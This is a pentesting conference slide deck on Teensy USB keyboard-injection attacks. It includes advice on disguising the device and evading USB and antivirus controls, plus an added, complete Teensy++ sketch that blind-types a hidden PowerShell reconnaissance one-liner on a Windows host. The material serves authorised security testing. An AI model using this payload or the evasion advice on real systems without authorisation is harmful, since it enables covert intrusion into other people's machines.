1. MERE PAAS TEENSY HAI (I HAVE TEENSY)
OR
COMPROMISING A HIGHLY SECURE
ENVIRONMENT PART 2
Nikhil Mittal (SamratAshok)
2. ABOUT ME
SamratAshok
Twitter - @nikhil_mitt
Penetration Tester with PwC India
I am interested in Offensive Information Security,
new attack vectors and methodologies to pwn
systems.
Creator of Kautilya and Maareech
Previous Talks
Ultimate Pen Testing: Compromising a highly secure
environment, ClubHack'10
Here are your Keystrokes, Hackfest'11
Upcoming Talks
Kautilya: Teensy beyond shell, BlackHat Abu Dhabi'11
3. OVERVIEW
Why the Title?
Current State of Pentesting
Questions being raised to us
The answer to the questions
What’s done
What we will do
Limitations
Future
Conclusion
4. WHY THE TITLE?
What I told the ClubHack team:
I talked about compromising a highly secure
environment last year; let's continue with the pwnage!!
Thanks to the team for buying that and allowing me to
speak.
The real reason:
5.
6. A TYPICAL PEN TEST SCENARIO
A client engagement comes with IP addresses.
We need to complete the assignment in a very
restrictive time frame.
Pressure is on us to deliver a "good" report with
some high severity findings (that "High" rendered
inside a red box).
8. This is a best case scenario.
Only lucky ones find that.
Generally legacy Enterprise Applications or
Business Critical applications are not upgraded.
There is almost no fun doing it that way.
9. SOME OF US DO IT BETTER
Enum -> Scan -> Exploit -> Report
10. SOME OF US DO IT EVEN BETTER
Enum + Intel -> Scan -> Exploit -> Post Exp -> Report
11. WHY DO WE NEED TO EXPLOIT?
To gain access to the systems.
This shows clients the real threat: we can actually
make an impact on their business. No more
"so what?"
We can create reports with “High” Severity findings.
<Audience>
12. WHAT DO WE EXPLOIT?
Memory Corruption bugs.
Server side
Client Side
Humans
Misconfigurations
Design Problems
<Audience>
13. QUESTIONS BEING RAISED TO US
Many times we find vulnerabilities but can't
exploit them.
No public exploits available.
Not allowed on the system.
Countermeasure blocking it.
Exploit completed but no session was generated :P
Kya hai tumhare paas? (What do you have?)
14. QUESTIONS BEING RAISED TO US
Hardened Systems
Patches in place
Countermeasures blocking scans and exploits
Security incident monitoring and blocking
Kya hai tumhare paas? (What do you have?)
15. QUESTIONS BEING RAISED TO US
Just a bad day.
Exploit completed but no session was generated :P
Kya hai tumhare paas? (What do you have?)
16. ALTERNATIVES
Open file shares.
Sticky slips.
Social Engineering attacks.
Man In The Middle (many types)
SMB Relay
<Audience>
17. THE ANSWER TO THE QUESTIONS
TEENSY
A USB Micro-controller device.
We will use Teensy++ 2.0, the larger variant of Teensy
(more flash and more I/O pins than the plain Teensy 2.0).
Available for $24 from pjrc.com
Mere paas Teensy hai (I have Teensy)
18. USING TEENSY
Find an unattended system and insert the Teensy
device into a USB port.
Fool your victim by disguising it as a mouse, USB
toy, thumb drive etc.
Generally Teensy needs just a minute to complete
the job.
You can program it according to your needs.
Teensy enumerates as a USB HID keyboard, not as
storage, so removable-media blocking and AV scans of
USB drives don't see it. Undetected and unblocked,
Teensy works great for popping shells.
19. WHAT’S DONE
Arduino-based attack vector in the Social-Engineer
Toolkit (SET) by David Kennedy
Contains some really awesome payloads.
Almost all payloads are for popping shells.
20. WHAT WE WILL DO
Teensy can be used for much more than popping
shells.
It can be used to perform pre and post exploitation.
We will have a detailed look at some of these
payloads and will understand how to create
payloads as per our needs.
21. DESCRIPTION OF PAYLOADS
Mostly for Windows, as desktops generally run
Windows.
Payloads vary from one line commands to powerful
scripts.
If you know powershell scripting, payloads will
make more sense and will be easier to customize.
31. BUT
What if even Teensy doesn't work, with the other
options already ruled out?
What if the USB ports have been physically removed?
Would it be impossible to pwn such an environment?
43. LIMITATIONS
Limited storage on Teensy. Resolved by attaching an
SD card to the Teensy.
Inability to "read" from the system. Keystrokes flow
one way, so you have to assume how the victim OS
responds (window focus, timing, keyboard layout)
and pad each step with delays.
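Added example for the payload description (slide 21) and the one-way limitation (slide 43). This is not code from the talk, and not one of Kautilya's or SET's payloads: a Teensy++ 2.0 sketch for the Arduino IDE with Teensyduino, with USB Type set to "Keyboard". It opens the Run dialog on an unlocked Windows desktop with Win+R and types a PowerShell one-liner that writes basic host information to a file. The recon.txt path, the command itself and every delay value are assumptions. Because nothing can be read back from the host, each step is paced by a fixed delay and the payload is typed exactly once.

```arduino
// Teensy++ 2.0 sketch (Arduino IDE + Teensyduino, Tools > USB Type: Keyboard).
// Added example, not a Kautilya or SET payload. Assumed target: an unlocked
// Windows desktop with PowerShell installed and a US keyboard layout.

// All timing is guesswork: the host never tells the Teensy what happened.
const unsigned long ENUMERATE_MS  = 5000; // host must enumerate the new keyboard
const unsigned long RUN_DIALOG_MS = 1500; // Win+R dialog must appear and take focus
const unsigned long SETTLE_MS     = 1000; // typed text must land before Enter

// Reconnaissance one-liner (assumed; the output path is hypothetical).
// Single quotes are used inside so nothing needs escaping when typed into
// the Run dialog, which passes everything after "powershell" to the process.
const char *PAYLOAD =
  "powershell -NoProfile -WindowStyle Hidden -Command "
  "\"$o = Join-Path $env:TEMP 'recon.txt'; "
  "hostname | Out-File $o; "
  "whoami /all | Out-File $o -Append; "
  "ipconfig /all | Out-File $o -Append; "
  "Get-Process | Out-File $o -Append\"";

// Press and release one key with an optional modifier (Teensyduino API).
void tap(uint8_t modifier, uint8_t key) {
  Keyboard.set_modifier(modifier);
  Keyboard.set_key1(key);
  Keyboard.send_now();
  delay(50);                      // hold long enough for the host to register it
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
}

void setup() {
  delay(ENUMERATE_MS);
  tap(MODIFIERKEY_GUI, KEY_R);    // Win+R opens the Run dialog
  delay(RUN_DIALOG_MS);
  Keyboard.print(PAYLOAD);        // typed blind: we assume the dialog has focus
  delay(SETTLE_MS);
  tap(0, KEY_ENTER);              // launch; PowerShell runs hidden
}

void loop() {
  // Intentionally empty: the payload must run once per insertion. Retyping it
  // in loop() would spray keystrokes into whatever window has focus.
}
```

Two things to check before using this on a real engagement: the Teensy sends US keycodes, so on a non-US layout characters such as `$`, `|` and `"` land on other keys and the one-liner breaks silently; and the delays should be raised rather than lowered on slow or heavily monitored hosts, since a keystroke that arrives before the Run dialog has focus goes into the previous window and cannot be taken back.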
44. FUTURE
Kautilya
Improvement in current payloads.
New payloads for non-traditional shells.
Dropping executables using additional storage
(already done).
45. CONCLUSION
Used wisely, Teensy can serve as a complete
penetration testing device, though with its own
limitations.
It's a cheap device, so use it.
Please use Kautilya and give feedback once it is
released.
Mere paas Teensy hai (I have Teensy)